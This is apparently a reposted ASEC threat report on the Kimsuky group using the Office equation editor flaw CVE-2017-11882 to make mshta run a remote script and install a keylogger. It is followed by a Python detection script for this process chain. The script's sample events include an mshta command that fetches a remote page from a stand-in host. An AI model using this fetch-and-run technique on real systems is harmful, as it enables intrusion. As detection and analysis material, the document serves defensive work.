Keylogger Installed Using MS Office Equation Editor Vulnerability (Kimsuky)
Malware Analysis, News and Indicators - Latest topics malware.news
AhnLab SEcurity intelligence Center (ASEC) has identified details of the Kimsuky threat group recently exploiting a vulnerability (CVE-2017-11882) in the equation editor (EQNEDT32.EXE) included in MS Office to distribute a keylogger. The threat actor exploited the vulnerability to make the mshta process run a page containing an embedded malicious script, and distributed the keylogger that way.
Figure 1. mshta.exe executed via the equation editor program (EQNEDT32.exe)
Figure 2. The C2 server screen (mshta.exe)
The page that mshta connects to is http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php …
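The process chain in Figure 1 (EQNEDT32.EXE launching mshta.exe against a remote page) can be hunted for in process-creation telemetry. The following is an added example, not code from ASEC or the original page; the field names follow Sysmon Event ID 1, and the sample events, host names and severity labels are constructed assumptions.

```python
import json
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 field names); not taken from the report.
SAMPLE_EVENTS = r"""
{"ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE","CommandLine":"EQNEDT32.EXE -Embedding"}
{"ParentImage":"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe http://host.example.invalid/page.php"}
{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe C:\\Users\\a\\help.hta"}
{"ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\SysWOW64\\mshta.exe","CommandLine":"mshta HTTPS://host.example.invalid/a.hta"}
{"ParentImage": truncated
"""

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, reason) for a process-creation event, or None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    remote = bool(URL_RE.search(event.get("CommandLine", "")))
    if parent == "eqnedt32.exe":
        # Assumption: any child process of the equation editor is treated as anomalous.
        if child == "mshta.exe" and remote:
            return ("critical", "EQNEDT32.EXE spawned mshta.exe with a remote URL")
        return ("high", f"EQNEDT32.EXE spawned {child}")
    if child == "mshta.exe" and remote:
        return ("medium", "mshta.exe launched with a remote URL")
    return None

def detect(log_text):
    """Scan JSON-lines telemetry; return [(line_number, severity, reason), ...]."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or malformed records
        verdict = classify(event)
        if verdict:
            findings.append((lineno, *verdict))
    return findings

if __name__ == "__main__":
    for lineno, severity, reason in detect(SAMPLE_EVENTS):
        print(f"line {lineno}: [{severity}] {reason}")
```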